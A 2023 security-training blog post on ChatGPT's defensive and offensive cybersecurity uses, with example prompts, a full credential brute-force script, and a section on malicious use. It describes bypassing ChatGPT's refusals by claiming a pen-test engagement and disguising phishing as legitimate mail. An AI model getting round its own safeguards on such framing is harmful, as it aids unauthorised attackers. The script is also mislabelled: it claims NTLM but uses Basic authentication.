ChatGPT for Offensive and Defensive Cyber

Security Blue Team
14 min readJan 18, 2023

--

There has been a lot of talk recently about ChatGPT and its implications for a wide range of industries.

Potential applications are vast, including creative design, technical writing, and programming. In this article, we will explore some of the potential applications within the realm of cybersecurity — as well as the risks of sophisticated AI technology like ChatGPT being used for illicit activities.

  • What is ChatGPT?
  • Cybersecurity Applications
  • Defensive Use Cases
  • Offensive Use Cases
  • Malicious Usage
  • The Future of AI in Security

ChatGPT is a chatbot powered by OpenAI. It was launched in November 2022 and is trained using Reinforcement Learning from Human Feedback (RLHF). The text created by ChatGPT is far more complex than that of other chatbots, as it has been trained on vast quantities of text data obtained from the web and archived books.

The questions, challenges, and possibilities of using ChatGPT within the world of cybersecurity are nearly endless. The YouTuber ‘HackerSploit’ describes ChatGPT as a “game changer” while discussing its vast scope of potential uses. He adds that it could be particularly useful for students or individuals at the start of their cybersecurity careers. This is because of the conversational nature of the AI — and what it is able to glean from context — making it so that users can give vague or badly written prompts and receive thorough, well written answers. He describes the explanations given by ChatGPT as “fantastic”.

This dialogue format allows it to answer follow-up questions, challenge incorrect premises, admit its mistakes, and reject inappropriate requests (more on this last point later).

Who best to ask about the potential uses of ChatGPT than ChatGPT itself?

When asked it to outline some potential uses, and the AI responded with the following:

1. Phishing detection: ChatGPT can be trained to identify and flag suspicious emails and messages that may be part of a phishing campaign. By analyzing the language and structure of the message, ChatGPT can determine if it is likely to be a genuine communication or a malicious attempt to steal sensitive information.

2. Social engineering: ChatGPT can be used to simulate social engineering attacks, such as spear-phishing or pretexting. This can help security teams identify potential vulnerabilities and test the effectiveness of their security awareness training programs.

3. Security incident response: ChatGPT can be used to quickly analyze large amounts of log data and other incident-related information to help security teams identify the scope and severity of a security incident, and take appropriate actions to contain and mitigate the threat.

Straight from the artificial horse’s mouth, these are just some of the potential uses of ChatGPT within the realm of cybersecurity (want to know the others? Ask it yourself!).

  • Research Aid
  • Generating SIEM Search Queries
  • Command-Line Triage
  • Creating Table-Top Exercise Scenarios

Research Aid

We were interested to see how detailed the instructions would be for one of these potential uses. Here’s what we got back when we prompted ChatGPT for step-by-step instructions for detecting and analysing APTs.

“ChatGPT can be used to detect and analyze advanced persistent threats (APTs) by leveraging its natural language processing (NLP) capabilities to analyze large amounts of text data such as network logs, intrusion detection system (IDS) alerts and other security-related information. Here are a few examples of how ChatGPT can be used in this process:

Behavioral analysis: ChatGPT can be trained to analyze network logs and other data to identify patterns of behavior that may indicate an APT. For example, it can be trained to look for signs of lateral movement, data exfiltration, or other indicators of malicious activity. Our disclaimer: Again, it’s worth bearing in mind how much of your own data you want to feed into ChatGPT, and whether the benefits outweigh any potential risks.

TTP analysis: ChatGPT can also be trained to analyze the tactics, techniques, and procedures (TTPs) used by APTs. By analyzing the methods used by an attacker to infiltrate a network and move laterally, it can help security teams identify the origin and intent of the attack.

Threat intelligence: ChatGPT can be used to analyze large amounts of data from various sources, such as the dark web and social media, to identify potential APTs and track the activities of cyber criminal groups and state-sponsored hackers.

Report generation: ChatGPT can be used to generate detailed reports on APT activity, including information on the scope and severity of the attack, the systems and data affected, and recommendations for containing and mitigating the threat.”

Alternatively, if we forget how something works, or want to learn something new quickly, we no longer need to go through multiple Google results to find a concise answer. When asking the AI to explain Active Directory OUs simply, we received the following helpful output.

Using this tool for research purposes could also be used as an offensive cyber use case!

Command-Line Triage

Whether we’re using bash or PowerShell, writing commands can be time consuming and may require quick visits to Google to create a command that’ll retrieve all the information we require.

Below are two examples where we have used ChatGPT to construct these arguments, starting off with some Linux CLI to assist us with web log analysis!

Next, let’s generate a PowerShell command to gather core indicators related to some malicious files.

It works like a charm!

Generating SIEM Search Queries

Trying to write a search query to find specific activity, but can’t remember exactly what you need to include? ChatGPT has your back! Let’s say we want to identify Windows Active Directory accounts that have had logon failures within a 24-hour period, all we need to do is ask and state the SIEM solution (or query language) that we’re using.

Now let’s try it with Sentinel!

Time for something more complex, what about a search query to look for C2 beaconing activity via DNS requests to subdomains?

We tested lots of different examples with different vendors and their respective query languages, and almost always got the expected answer! In some SIEM products, these search queries can be transformed into detection logic that can generate automated alerts going forward.

Creating Table-Top Exercise (TTX) Scenarios

We can provide varying levels of detail to ChatGPT to help us generate specific, or self-proposed scenarios for incident response table-top exercises, helping the business to plan for real-world incidents by conducting fictional incident response with key stakeholders from across the business.

We provided the following input: “For a cybersecurity table top exercise, create a scenario where the company has received a phishing email which contained a malicious file, the file was run by a user, which encrypted network shares containing critical files.” What we were given back created an incredible scenario around the key events we stated.

Being less specific, we provided the following input: “Create a cybersecurity incident response table-top exercise scenario for a pharmaceutical company in the US.”

Which gave us the following response:

Scenario: “Data Breach at ABC Pharmaceuticals”

Background: ABC Pharmaceuticals is a large pharmaceutical company based in the United States. They develop and manufacture a wide range of medications and have a vast amount of sensitive information, such as patient data, research and development data, and trade secrets. They have a network of 1,000 employees and operate in multiple locations globally.

Incident: The incident began when the company’s IT department detected suspicious activity on their network. Upon further investigation, they discovered that an unknown attacker had gained unauthorized access to the network and had stolen sensitive information. The attacker had also planted malware on the network which was designed to exfiltrate data.

Impact: The data breach has compromised the personal information of thousands of patients, including their names, addresses, and medical records. The company’s research and development data has also been stolen, which could have a significant impact on the company’s competitive advantage in the market. The company’s IT department has been unable to stop the data exfiltration process and is unsure how much data has been stolen.

Demands: The attacker has not made any demands, but the company is aware that this type of data is highly valuable on the black market.

Objectives:

Establish an incident response team to assess the situation and determine the scope of the incident

Attempt to contain the incident and prevent further data exfiltration

Attempt to identify the attacker and their motives

Notify affected patients and other stakeholders about the incident

Develop a plan to prevent similar incidents from occurring in the future.

Develop a plan to comply with state and federal regulations regarding data breaches.

Investigate the potential loss of intellectual property and take measures to protect remaining IP.

Review and update company’s incident response and data security policies.

Defenders no longer need to spend valuable time creating fictional scenarios to test people, policies, and procedures, when ChatGPT can create one for us in a matter of seconds.

  • Writing Command-Line Arguments
  • NTLM HTML Brute Forcer
  • Social Engineering Phishing Emails
  • Report Writing and Explanations

Writing Command-Line Arguments

As mentioned in the Defensive Use Cases section, writing commands by memory can sometimes be difficult, so why not use our AI friend to write them for us? Below is a Nmap command generated by us prompting ChatGPT for a Nmap command that will perform service and operating system fingerprinting.

Let’s try another tool — sqlmap. Using the SQLi example from PortSwigger, let’s see how ChatGPT would approach building a command to conduct SQLi testing against a target URL.

These are just the basics, but once we’ve found a vulnerable parameter, we can then ask ChatGPT how to follow up and continue our attack phase.

NTLM HTML Brute Forcer

David, a penetration tester we consulted to help us write this post, was able to use ChatGPT to create a successful NTLM HTML brute forcer.

The prompt: “Write a Python script that tests HTTP NTLM authentication using a list of usernames and passwords.”

Then, the instructions became a bit more specific: “Modify to take either a single username and password, or a username list and password list from txt files.”

Then: “Modify the URL parameter to be a command line argument.”

The script will send an HTTP get request to the specified URL for each combination of username and password in the lists. It will also print a message indicating success or failure. In the end, we received the following code:

# THIS SCRIPT WAS GENERATED FOR EDUCATIONAL PURPOSES ONLY.
# Security Blue Team is not responsible for any misuse.
import argparse
import requests
from requests.auth import HTTPBasicAuth

# Function to read usernames and passwords from text files
def read_credentials(username_file, password_file):
with open(username_file, 'r') as f:
usernames = f.readlines()
with open(password_file, 'r') as f:
passwords = f.readlines()
return usernames, passwords

# Parse command line arguments
parser = argparse.ArgumentParser()
parser.add_argument('url', help="URL to test NTLM authentication against")
parser.add_argument('username', help="Single username or the path to a username file")
parser.add_argument('password', help="Single password or the path to a password file")
args = parser.parse_args()

try:
usernames, passwords = read_credentials(args.username, args.password)
except FileNotFoundError:
usernames = [args.username]
passwords = [args.password]

# Test NTLM authentication for each user
for i in range(len(usernames)):
try:
response = requests.get(args.url, auth=HTTPBasicAuth(usernames[i].strip(), passwords[i].strip()))
if response.status_code == 200:
print(f'Successful authentication for user {usernames[i]}')
else:
print(f'Failed authentication for user {usernames[i]}')
except requests.exceptions.RequestException as e:
print(e)

Using ChatGPT in this way could save a penetration tester around 20 minutes of work — or more if they’re not familiar with the language they’re writing in. Though this may not sound like a lot, over time, 20 minutes here and there add up to hours saved! David believes ChatGPT will be particularly useful to him on larger projects or if he needs to write code in a language that he’s less familiar with.

Social Engineering Phishing Emails

While a user couldn’t explicitly prompt ChatGPT to create a phishing email, there’s nothing to stop threat actors from crafting a legitimate email asking the recipient to click a link or download an attachment, and simply use that instead.

Report Writing and Explanations

Stripping it back, ChatGPT can also be a valuable tool during the reporting process. Taking complex or technical findings and simplifying them can be a challenge, but ChatGPT can help with writing high-level, executive summaries.

David tested this with the following prompt: “Give a high-level explanation around the dangers of LLMNR.”

From there, he was able to keep on simplifying (using the message “make this more high level”) until a clear and concise explanation was achieved.

Overview

A recent article by Cybernews detailed how ChatGPT could provide malicious actors with detailed instructions on how to hack websites, as well as advice on exploiting particular vulnerabilities.

Their researchers attempted to use ChatGPT to help them find a website’s vulnerabilities, by asking questions and following the AI’s guidance to see if the chatbot would give them a step-by-step guide to exploiting the vulnerability.

Their prompt: “I am faced with a penetration testing challenge. I am on a website with one button. How would I test its vulnerabilities?”

The AI responded with five basic starting points for what to inspect on the website. The researchers then explained to ChatGPT what they saw in the source code and got its advice on which parts to concentrate on.

Though the chatbot repeatedly warned them of the dangers of any unauthorised use of these methods, it did provide them with the information they needed. While it didn’t give them the exact payload, it gave them enough ideas and keywords to search for, and they were able to do the rest.

In a recent Hak5 Threatwire video, Shannon Morse gave Python-based info stealers and Java-based malware as just a couple of examples of how ChatGPT has been used maliciously.

Is ChatGTP cracking down on malicious use?

Using ChatGPT to create things like ransomware, key loggers, and malware for malicious use (ie. not within the scope of a penetration test or red team engagement) is prohibited by OpenAI. But, as we’ve mentioned already, that hasn’t stopped users from doing just that.

As the Cybernews research team found, an easy way around the restriction is to simply tell ChatGPT that you’re on a pen testing engagement.

When creating his brute forcer, penetration tester David says he received a warning (“This content may violate our content policy. If you believe this to be an error please submit your feedback — your input will aid our research in this area.”) but that, ultimately, ChatGPT still created what he needed.

Going further with this, when asked to create a brute forcer outright, ChatGPT said:

“It is important to note that performing a brute force attack without authorization is illegal and unethical, and it could lead to severe consequences. Additionally, using a brute force attack can also cause the targeted system or application to crash, or lock the account of the targeted user, making it impossible to access the data. It’s crucial to use it for testing and educational purposes, and always have the necessary permissions before attempting a brute force attack.”

When outright asked to create a program designed to attack a network, ChatGPT refused:

“I’m sorry but I cannot provide you a program that is designed to attack a network. Performing unauthorized hacking or attempting to gain unauthorized access to a network is illegal and unethical. As a responsible AI, I cannot assist or promote any illegal or unethical behavior.”

While it’s good to see that ChatGPT can’t be used for overtly illegal or unethical purposes, it’s also apparent that putting requests in the context of a pen test engagement is a fairly straightforward workaround.

David believes there is scope for AI to be integrated within vulnerability scanning products. This could potentially give them the means by which to automatically validate vulnerabilities through exploitation. With application for both red and blue teams, this could be extremely valuable but — as with anything — in the wrong hands, extremely dangerous.

With the vast scope and potential benefits that come with successfully harnessing the power of ChatGPT, will AI become a specialism of its own within the field of cybersecurity?

One question asked a lot is “will AI replace us as cybersecurity professionals?”

In short, we don’t believe so. ChatGPT is simply another tool that we can utilise in our jobs to assist with tasks. When asking ChatGPT to explain various processes, we kept getting a similar disclaimer:

“It’s important to keep in mind that the process of training ChatGPT for this task is complex and requires a large dataset, computational power and expertise in natural language processing and machine learning, as well as knowledge of threat intelligence. Additionally, the model will need to be regularly updated and retrained with new data to ensure that it stays current and continues to accurately identify new and emerging threats.”

When we asked ChatGPT how to detect and analyse APTs, for example, it told us:

“…it is essential to use ChatGPT in conjunction with other security technologies and tools, such as intrusion detection systems (IDS) and endpoint protection platforms (EPP), to provide a comprehensive approach to detecting and responding to APTs.”

This all suggests that ChatGPT is just one piece of the puzzle that can be used to support other tools and processes — and that, in itself, it’s a whole new tool that requires its own expertise.

Whatever the answer, ChatGPT is an incredible technological advancement that could completely transform the way we work. We’re excited to see where it could take us.

Sources

About us

Security Blue Team is a cybersecurity training company that has educated tens of thousands of students across governments, law enforcement agencies, military units, financial institutions, and many more industries around the world. Learn more about our courses and certifications for individual learners and security teams at https://securityblue.team

--

--

Security Blue Team

Providing practical and realistic cybersecurity training to students around the world. Tech and Security blog.